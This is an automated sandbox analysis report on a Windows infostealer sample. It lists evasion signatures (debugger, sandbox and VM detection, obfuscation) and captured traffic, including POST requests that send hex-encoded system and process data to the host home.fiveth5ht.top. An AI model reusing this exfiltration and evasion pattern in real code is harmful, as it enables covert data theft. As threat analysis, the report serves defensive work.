Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
f7qbEfJl0B.exe

Overview

General Information

Sample name:f7qbEfJl0B.exe
renamed because original name is a hash value
Original sample name:01fbecb34b5ac1c9c3336c64817f1637.exe
Analysis ID:1581409
MD5:01fbecb34b5ac1c9c3336c64817f1637
SHA1:51f08b5cfb4d7c7c0bb96b8c0c171e3cf05e27ab
SHA256:828c90e4bd13605fdf955b30e36336ff08d5f10858f21fdf38529debdd216013
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • f7qbEfJl0B.exe (PID: 7252 cmdline: "C:\Users\user\Desktop\f7qbEfJl0B.exe" MD5: 01FBECB34B5AC1C9C3336C64817F1637)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: f7qbEfJl0B.exeAvira: detected
Multi AV Scanner detection for submitted file
Source: f7qbEfJl0B.exeReversingLabs: Detection: 39%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: f7qbEfJl0B.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: -----BEGIN PUBLIC KEY-----0_2_00FBDCF0
Source: f7qbEfJl0B.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: f7qbEfJl0B.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_2_00F9255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00F9255D
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_2_00F929FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_00F929FF
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 442896Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 37 31 33 37 33 35 30 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 2
Source: global trafficHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 128Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 5c 2f 68 31 3e 5c 6e 54 68 65 20 73 65 72 76 65 72 20 64 69 64 6e 27 74 20 72 65 73 70 6f 6e 64 20 69 6e 20 74 69 6d 65 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "<html><body><h1>504 Gateway Time-out<\/h1>\nThe server didn't respond in time.\n<\/body><\/html>\n", "data": "Done1" }
Source: Joe Sandbox ViewIP Address: 34.226.108.155 34.226.108.155
Source: Joe Sandbox ViewIP Address: 5.101.3.217 5.101.3.217
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_2_00F97770 recv,0_2_00F97770
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.fiveth5ht.top
Source: unknownHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 442896Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 37 31 33 37 33 35 30 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 2
Source: f7qbEfJl0B.exe, 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmp, f7qbEfJl0B.exe, 00000000.00000003.1733858807.0000000007080000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.css
Source: f7qbEfJl0B.exe, 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmp, f7qbEfJl0B.exe, 00000000.00000003.1733858807.0000000007080000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.jpg
Source: f7qbEfJl0B.exe, f7qbEfJl0B.exe, 00000000.00000003.2159624381.000000000076E000.00000004.00000020.00020000.00000000.sdmp, f7qbEfJl0B.exe, 00000000.00000002.2173176554.000000000077A000.00000004.00000020.00020000.00000000.sdmp, f7qbEfJl0B.exe, 00000000.00000003.2160083442.0000000000779000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQ
Source: f7qbEfJl0B.exe, 00000000.00000003.1733858807.0000000007080000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17
Source: f7qbEfJl0B.exe, 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmp, f7qbEfJl0B.exe, 00000000.00000002.2172952081.00000000006DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
Source: f7qbEfJl0B.exe, 00000000.00000002.2172952081.00000000006DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF173518686235a1
Source: f7qbEfJl0B.exe, 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS
Source: f7qbEfJl0B.exe, 00000000.00000003.2159624381.000000000076E000.00000004.00000020.00020000.00000000.sdmp, f7qbEfJl0B.exe, 00000000.00000002.2173176554.000000000077A000.00000004.00000020.00020000.00000000.sdmp, f7qbEfJl0B.exe, 00000000.00000003.2160083442.0000000000779000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQ~
Source: f7qbEfJl0B.exe, 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmp, f7qbEfJl0B.exe, 00000000.00000003.1733858807.0000000007080000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://html4/loose.dtd
Source: f7qbEfJl0B.exe, 00000000.00000003.1733858807.0000000007080000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: f7qbEfJl0B.exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: f7qbEfJl0B.exe, 00000000.00000003.1733858807.0000000007080000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: f7qbEfJl0B.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: f7qbEfJl0B.exe, f7qbEfJl0B.exe, 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmp, f7qbEfJl0B.exe, 00000000.00000003.1733858807.0000000007080000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: f7qbEfJl0B.exeString found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: f7qbEfJl0B.exe, 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmp, f7qbEfJl0B.exe, 00000000.00000003.1733858807.0000000007080000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ip
Source: f7qbEfJl0B.exe, 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmp, f7qbEfJl0B.exe, 00000000.00000003.1733858807.0000000007080000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443

System Summary

barindex
PE file contains section with special chars
Source: f7qbEfJl0B.exeStatic PE information: section name:
Source: f7qbEfJl0B.exeStatic PE information: section name: .idata
Source: f7qbEfJl0B.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_2_0105B1800_2_0105B180
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_2_00FA05B00_2_00FA05B0
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_2_00FA6FA00_2_00FA6FA0
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_2_00FA10E60_2_00FA10E6
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_2_0131A0000_2_0131A000
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_2_0131E0500_2_0131E050
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_2_010600E00_2_010600E0
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_2_0105C3200_2_0105C320
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_2_00FF62100_2_00FF6210
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_2_013035B00_2_013035B0
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_2_012FD4300_2_012FD430
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_2_010604200_2_01060420
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_2_012F67300_2_012F6730
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_2_0105C7700_2_0105C770
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_2_013217A00_2_013217A0
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_2_013147800_2_01314780
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_2_00F9E6200_2_00F9E620
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_2_0104C9000_2_0104C900
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_2_012E99200_2_012E9920
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_2_010498800_2_01049880
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_2_00F9A9600_2_00F9A960
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_2_00FA49400_2_00FA4940
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_2_01308BF00_2_01308BF0
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_2_01301BD00_2_01301BD0
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_2_00FD1BE00_2_00FD1BE0
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_2_01313A700_2_01313A70
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_2_00F9CBB00_2_00F9CBB0
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_2_01166AC00_2_01166AC0
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_2_01314D400_2_01314D40
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_2_0130CD800_2_0130CD80
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_2_00FA5DB00_2_00FA5DB0
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_2_0131CC900_2_0131CC90
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_2_012F7CC00_2_012F7CC0
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_2_00FA3ED00_2_00FA3ED0
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_2_00FB5EB00_2_00FB5EB0
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_2_0105EF900_2_0105EF90
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_2_01058F900_2_01058F90
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_2_012E2F900_2_012E2F90
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_2_012AAE300_2_012AAE30
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_2_00FB4F700_2_00FB4F70
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_3_007823600_3_00782360
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_3_007824810_3_00782481
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_3_007823600_3_00782360
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_3_007824810_3_00782481
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: String function: 00FD50A0 appears 31 times
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: String function: 010744A0 appears 72 times
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: String function: 00F971E0 appears 42 times
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: String function: 0116CBC0 appears 81 times
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: String function: 00F9CAA0 appears 40 times
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: String function: 00FACD40 appears 40 times
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: String function: 00FACCD0 appears 38 times
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: String function: 00FD4FD0 appears 183 times
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: String function: 00F973F0 appears 86 times
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: String function: 00F975A0 appears 530 times
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: String function: 01147220 appears 78 times
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: String function: 00FD4F40 appears 174 times
Source: f7qbEfJl0B.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: f7qbEfJl0B.exeStatic PE information: Section: lrpylste ZLIB complexity 0.9943323563117066
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@6/2
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_2_00F9255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00F9255D
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeCode function: 0_2_00F931D7 CreateToolhelp32Snapshot,CloseHandle,0_2_00F931D7
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: f7qbEfJl0B.exeReversingLabs: Detection: 39%
Source: f7qbEfJl0B.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: f7qbEfJl0B.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeSection loaded: kernel.appcore.dllJump to behavior
Source: f7qbEfJl0B.exeStatic file information: File size 4487168 > 1048576
Source: f7qbEfJl0B.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x288a00
Source: f7qbEfJl0B.exeStatic PE information: Raw size of lrpylste is bigger than: 0x100000 < 0x1bb200

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeUnpacked PE file: 0.2.f7qbEfJl0B.exe.f90000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lrpylste:EW;fpogxiqp:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lrpylste:EW;fpogxiqp:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: f7qbEfJl0B.exeStatic PE information: real checksum: 0x448a7f should be: 0x450c00
Source: f7qbEfJl0B.exeStatic PE information: section name:
Source: f7qbEfJl0B.exeStatic PE information: section name: .idata
Source: f7qbEfJl0B.exeStatic PE information: section name:
Source: f7qbEfJl0B.exeStatic PE information: section name: lrpylste
Source: f7qbEfJl0B.exeStatic PE information: section name: fpogxiqp
Source: f7qbEfJl0B.exeStatic PE information: section name: .taggant
